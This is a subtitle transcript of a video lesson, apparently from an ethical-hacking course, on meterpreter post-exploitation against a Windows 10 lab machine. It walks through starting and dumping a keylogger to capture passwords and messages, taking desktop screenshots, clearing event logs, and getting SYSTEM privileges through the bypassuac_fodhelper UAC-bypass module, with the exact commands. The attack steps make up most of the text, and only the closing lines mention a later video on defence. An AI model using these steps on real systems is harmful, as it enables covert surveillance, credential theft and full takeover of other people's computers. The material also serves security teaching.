1
00:00:00,210 --> 00:00:02,090
Hello everybody and welcome back.

2
00:00:02,200 --> 00:00:05,040
And now let's check part two of the commands

3
00:00:05,070 --> 00:00:07,380
that we can run with the meterpreter shell.

4
00:00:07,650 --> 00:00:16,800
So let me just start up my exploit once again. So my listener, -j -z, and then I execute the program,

5
00:00:18,330 --> 00:00:20,640
and we get the meterpreter session opened.

6
00:00:20,640 --> 00:00:23,130
So sessions, this is all standard.

7
00:00:23,190 --> 00:00:25,340
We already covered how to enter the session.

8
00:00:25,340 --> 00:00:28,890
So, here we are in the meterpreter session.

9
00:00:28,920 --> 00:00:33,600
Now there are a few commands that we can use in order to interact with the system itself.

10
00:00:33,600 --> 00:00:40,610
So, for example, this command is very useful if you're, for example, attacking a lower or an older Windows

11
00:00:40,610 --> 00:00:41,490
system.

12
00:00:41,490 --> 00:00:46,380
What this does is, as it says right here, attempts to elevate your privileges to that of a local

13
00:00:46,380 --> 00:00:47,310
system.

14
00:00:47,310 --> 00:00:52,970
Now system privileges on Windows are the same as the root privileges on Linux.

15
00:00:53,040 --> 00:00:59,700
What that means, basically, is that once you actually get the system privileges you can say that

16
00:00:59,700 --> 00:01:07,380
you fully exploited the machine. As a user your commands, and basically your usage of all the other programs,

17
00:01:07,470 --> 00:01:08,970
are limited.

18
00:01:08,970 --> 00:01:12,180
So in order to do that you just type here getsystem.

19
00:01:12,570 --> 00:01:18,300
But this is a Windows 10 machine, so the privilege escalation won't really work here.

20
00:01:18,300 --> 00:01:23,010
Now there is another way to do the privilege escalation which I will show you just in a second,

21
00:01:23,010 --> 00:01:25,230
after we cover these other commands.

22
00:01:25,290 --> 00:01:32,370
So there are some commands such as play audio file on target system, not

23
00:01:32,420 --> 00:01:36,120
written on this, which is not really that important to us at the moment.

24
00:01:36,120 --> 00:01:43,470
What is important for us is, for example, the keylogger. If you just type here the command keyscan_start

25
00:01:43,470 --> 00:01:44,150
keyscan_start

26
00:01:44,190 --> 00:01:45,850
So let's just do that,

27
00:01:45,870 --> 00:01:49,630
keyscan_start.

28
00:01:49,950 --> 00:01:55,230
It will say right here, starting the keystroke sniffer. And it will record all of the keystrokes that

29
00:01:55,230 --> 00:01:58,260
the target enters on its machine, or on its keyboard.

30
00:01:58,290 --> 00:02:01,110
So, for example, let me just open notepad right here.

31
00:02:03,950 --> 00:02:10,530
And if I just start typing anything in the notepad, for example, hello world, and something like that,

32
00:02:11,430 --> 00:02:14,930
it will get written to our keylogger.

33
00:02:14,940 --> 00:02:20,530
So in order for us to print out what the target has typed on its keyboard, we can just type

34
00:02:20,640 --> 00:02:25,380
keyscan_dump. And, as you can see right here,

35
00:02:25,410 --> 00:02:27,870
this is the notepad which I typed in the search bar.

36
00:02:28,290 --> 00:02:33,680
So it captured that and it also captured the hello world, as we can see right here.

37
00:02:33,690 --> 00:02:36,150
This shift is referring to the capital letter.

38
00:02:36,150 --> 00:02:37,530
That's why it starts right here.

39
00:02:37,890 --> 00:02:42,920
So this is useful, for example, if you wanted to capture the password once the user logs in to any

40
00:02:42,940 --> 00:02:48,480
website. Unlike the man-in-the-middle attack where you can only target HTTP websites

41
00:02:48,480 --> 00:02:50,940
and some HTTPS websites,

42
00:02:51,060 --> 00:02:56,700
this will work on any website.
Or, basically, anything that the target types, since this is a keylogger

43
00:02:56,700 --> 00:02:59,620
installed on their local machine.

44
00:02:59,640 --> 00:03:05,430
This will capture it even if they type it on Facebook or even if they type messages in messengers. So you

45
00:03:05,430 --> 00:03:09,600
can just capture anything basically with this. In order for you to stop

46
00:03:09,600 --> 00:03:13,850
the keylogger, once you actually want to end it, you can just type here

47
00:03:13,860 --> 00:03:18,940
keyscan_stop. And this will stop the keystroke sniffer.

48
00:03:18,990 --> 00:03:24,900
So, once you type keyscan_dump it will no longer print the output of the target's keyboard usage.

49
00:03:24,900 --> 00:03:32,730
So, basically, what I usually do is, at the start, I always turn on the keyscan so

50
00:03:32,730 --> 00:03:37,470
I can capture everything that the target types. And then at the end, when I want to exit the session, I

51
00:03:37,470 --> 00:03:43,140
basically just dump the keystrokes and close the keylogger.

52
00:03:43,140 --> 00:03:45,540
So that is a really useful thing to have.

53
00:03:45,540 --> 00:03:46,990
It is installed in meterpreter so

54
00:03:46,990 --> 00:03:52,710
you can just type it with one simple command, and the keylogger will start. Now

55
00:03:52,710 --> 00:03:59,410
I would show you these commands as well, such as webcam_chat, webcam_snap, but my Windows machine doesn't

56
00:03:59,410 --> 00:04:01,870
really have a webcam so I won't be able to do that.

57
00:04:02,260 --> 00:04:06,580
What I can show you is, for example, this screenshot right here.

58
00:04:06,580 --> 00:04:10,860
This will grab a screenshot of the interactive desktop, which can also be useful.

59
00:04:10,880 --> 00:04:17,050
So let me just lower this so you can see.
If I just type here in the terminal, or in the meterpreter

60
00:04:17,080 --> 00:04:23,110
terminal, screenshot, you will see that it will say screenshot saved to root, and then some random name

61
00:04:23,110 --> 00:04:24,100
.jpeg.

62
00:04:24,280 --> 00:04:28,870
Now the screenshot will basically be this screen that you are watching right now. So let us check it

63
00:04:28,870 --> 00:04:29,410
out.

64
00:04:29,530 --> 00:04:36,070
If we go right here and we lower the screen. Now we know that it is saved in root

65
00:04:36,080 --> 00:04:38,750
so we go to places and then computer.

66
00:04:45,400 --> 00:04:45,990
OK.

67
00:04:46,010 --> 00:04:52,430
So, we go down, scroll to the root, and right here we can see the screenshot really did save right

68
00:04:52,430 --> 00:04:53,090
here.

69
00:04:53,120 --> 00:04:55,600
So this is also a useful thing to have.

70
00:04:56,270 --> 00:04:57,470
Now since we don't need it

71
00:04:57,470 --> 00:05:05,870
I will delete it now. Let me open in terminal. So open in terminal, and remove this.

72
00:05:05,950 --> 00:05:06,810
OK,

73
00:05:06,880 --> 00:05:07,380
good.

74
00:05:08,370 --> 00:05:12,540
Now, let's see if there is anything potentially interesting to us as well.

75
00:05:15,960 --> 00:05:17,700
So, for example...

76
00:05:18,200 --> 00:05:23,220
yeah, some of these commands you actually need administrative privileges to run. For example, the clearev,

77
00:05:23,220 --> 00:05:30,690
clear event log. You would need to actually have the system privileges in order to perform

78
00:05:30,690 --> 00:05:31,320
that.

79
00:05:31,350 --> 00:05:37,000
So, let's actually see how we can get the system privileges on the Windows 10 machine.

80
00:05:37,230 --> 00:05:44,550
Now, first of all, in Windows XP, for example, and maybe Windows 7. I'm not really sure about that.

81
00:05:45,180 --> 00:05:47,010
I'm not really sure about Windows 7.

82
00:05:47,160 --> 00:05:51,710
The getsystem command will work on Windows XP for sure.

83
00:05:51,750 --> 00:05:55,250
So just type in this command and you will be able to get the system privileges.

84
00:05:55,380 --> 00:05:58,590
But as we can see, that doesn't really work for us.

85
00:05:58,620 --> 00:06:03,660
So what we want to do is background this session right here.

86
00:06:05,430 --> 00:06:13,070
And the next thing you want to do is basically just search for the bypass module. So the bypass module,

87
00:06:13,070 --> 00:06:22,700
you just type here search bypassuac, and UAC is basically User Account Control. And you will

88
00:06:22,700 --> 00:06:27,830
see there are a few different modules that are used in order to bypass the User Account Control, which

89
00:06:27,830 --> 00:06:33,100
will give us, hopefully, the system privileges on the target machine.

90
00:06:33,110 --> 00:06:37,250
Now if you use the simple one, which is the first one, so you use this one.

91
00:06:39,110 --> 00:06:40,010
Let us use it.

92
00:06:40,100 --> 00:06:46,290
So use exploit/windows/local/bypassuac and we show our options on it.

93
00:06:46,490 --> 00:06:51,740
You will see that it doesn't really work on Windows 10. If I set here, or let me show targets

94
00:06:51,740 --> 00:06:54,800
first so we can see the available targets.

95
00:06:54,890 --> 00:07:01,790
It says right here that it works both on Windows 32-bit and on Windows 64-bit, but it really doesn't.

96
00:07:01,790 --> 00:07:07,640
So let's see if we specify right here the session, which is the only thing that it actually asks from us.

97
00:07:07,640 --> 00:07:11,140
So we check the session ID with the sessions command.

98
00:07:11,240 --> 00:07:15,890
We can see that our session ID is 2, and we set session to

99
00:07:16,880 --> 00:07:22,770
2. And if we show options once again, we can see that everything is correct.
And if I just type here

100
00:07:22,770 --> 00:07:30,210
exploit, this won't really work since our target, Windows 10, isn't really vulnerable to this attack.

101
00:07:30,780 --> 00:07:33,500
As we can see, exploit aborted due to failure.

102
00:07:33,510 --> 00:07:34,320
Not vulnerable.

103
00:07:34,320 --> 00:07:36,990
Windows 10 is not vulnerable.

104
00:07:36,990 --> 00:07:38,400
So, what else can we do?

105
00:07:38,400 --> 00:07:40,290
If we search bypass once again.

106
00:07:40,290 --> 00:07:42,540
So let me just find the command.

107
00:07:42,690 --> 00:07:47,310
So here it is. This one will work.

108
00:07:47,370 --> 00:07:50,760
I've checked all of these and the one that works the most,

109
00:07:50,880 --> 00:07:56,000
basically, this one also works sometimes. But, sometimes it just decides not to work.

110
00:07:56,040 --> 00:08:02,280
This one works in most of the cases. So, exploit/windows/local/bypassuac_fodhelper

111
00:08:02,550 --> 00:08:04,470
Windows UAC protection bypass.

112
00:08:04,500 --> 00:08:05,630
So it

113
00:08:05,640 --> 00:08:15,390
came out in 2017 and it is ranked as excellent. So, if you just copy this, and use, paste it here,

114
00:08:16,310 --> 00:08:17,400
and we can see that,

115
00:08:17,520 --> 00:08:22,560
basically, I believe it has the same options as the previous one. So the only thing we need to set is the

116
00:08:22,620 --> 00:08:23,420
session.

117
00:08:23,610 --> 00:08:28,490
So we set the session to 2 since that is the session that we are running on our target

118
00:08:28,510 --> 00:08:32,890
Windows 10 machine. And after that you just type here exploit.

119
00:08:32,890 --> 00:08:37,680
Now the only thing that will happen with this is, I believe, a PowerShell window will pop up for a brief

120
00:08:37,680 --> 00:08:45,210
second, and then it should close. Once it closes it will open a system meterpreter shell.
As we can see,

121
00:08:45,390 --> 00:08:46,180
sometimes, yeah,

122
00:08:46,200 --> 00:08:51,540
sometimes this happens as well. So it basically just says exploit was completed but no session was created.

123
00:08:51,600 --> 00:08:56,610
So what you want to do when it actually completes the exploit but the session isn't really created, and

124
00:08:56,640 --> 00:08:57,930
you didn't get the meterpreter shell,

125
00:08:57,930 --> 00:09:00,540
you want to run this command until you actually get it.

126
00:09:01,020 --> 00:09:05,320
So after a few tries you will be able to get the meterpreter shell.

127
00:09:05,640 --> 00:09:11,730
So we ran this a second time and, as we can see, we were able to receive the meterpreter shell.

128
00:09:11,730 --> 00:09:13,550
These are some of the things that it did.

129
00:09:13,560 --> 00:09:19,500
So as we can see, started reverse TCP handler, UAC is enabled, checking level, part of Administrators group,

130
00:09:19,500 --> 00:09:23,140
continuing, and it basically gives us a meterpreter shell.

131
00:09:23,250 --> 00:09:29,900
So, if we background this right now, and I clear our screen a little bit, and show my available sessions,

132
00:09:29,910 --> 00:09:33,870
you will see that right now we have two sessions available.

133
00:09:33,870 --> 00:09:38,100
Session 2 is the one that we ran with our shell.exe file right here.

134
00:09:38,130 --> 00:09:40,970
Let me just close this hello world since we need it.

135
00:09:40,980 --> 00:09:47,530
This is the second session, under ID 2, and the session with ID 3 is the one that we got with

136
00:09:47,720 --> 00:09:54,750
bypassuac_fodhelper, which we used in order to elevate our privileges. But if you notice right here, we

137
00:09:54,750 --> 00:10:00,960
are still not the administrator, or the system privilege account, on the target PC. We are still this

138
00:10:00,960 --> 00:10:01,810
account right here.

139
00:10:02,520 --> 00:10:10,770
So, what you want to do is enter the third session, which is the one that we got with the bypass.

140
00:10:11,220 --> 00:10:15,700
And right now if you just type here getsystem, the command will simply work,

141
00:10:15,930 --> 00:10:22,560
since we were able to bypass the User Account Control, or UAC. As we can see right here, if I just

142
00:10:22,560 --> 00:10:25,250
type here getuid, which will print out who I am,

143
00:10:25,260 --> 00:10:31,440
it will say I am NT AUTHORITY\SYSTEM, which is the highest level of privileges you can have on a Windows

144
00:10:31,440 --> 00:10:31,970
PC.

145
00:10:32,460 --> 00:10:37,520
And this means that we fully and successfully exploited the Windows 10 machine.

146
00:10:37,530 --> 00:10:42,000
Right now you can do anything you want to it. You can even change important files, you can crash Windows,

147
00:10:42,000 --> 00:10:48,350
you can download/upload, you can basically do anything, just like with root privileges on Linux.

148
00:10:48,360 --> 00:10:54,450
So if I background, and now type sessions once again, you will see that one of them is a simple user

149
00:10:54,450 --> 00:10:57,140
account and the other one is system authority.

150
00:10:58,170 --> 00:11:01,520
So, in the next video I will show you how

151
00:11:01,520 --> 00:11:07,770
you can actually...if you're running a Windows 10 machine, for example if that's your main host, how you

152
00:11:07,770 --> 00:11:09,930
can protect yourself from this attack.

153
00:11:09,930 --> 00:11:16,800
You can prevent anyone from actually bypassing this with fodhelper, and actually gaining the system

154
00:11:16,800 --> 00:11:18,250
privileges to your PC.

155
00:11:19,080 --> 00:11:24,040
So that would be about it for this tutorial of privilege escalation and some of the basic commands in

156
00:11:24,040 --> 00:11:27,670
meterpreter, and I hope I see you in the next one and take care.

157
00:11:27,820 --> 00:11:28,320
Bye!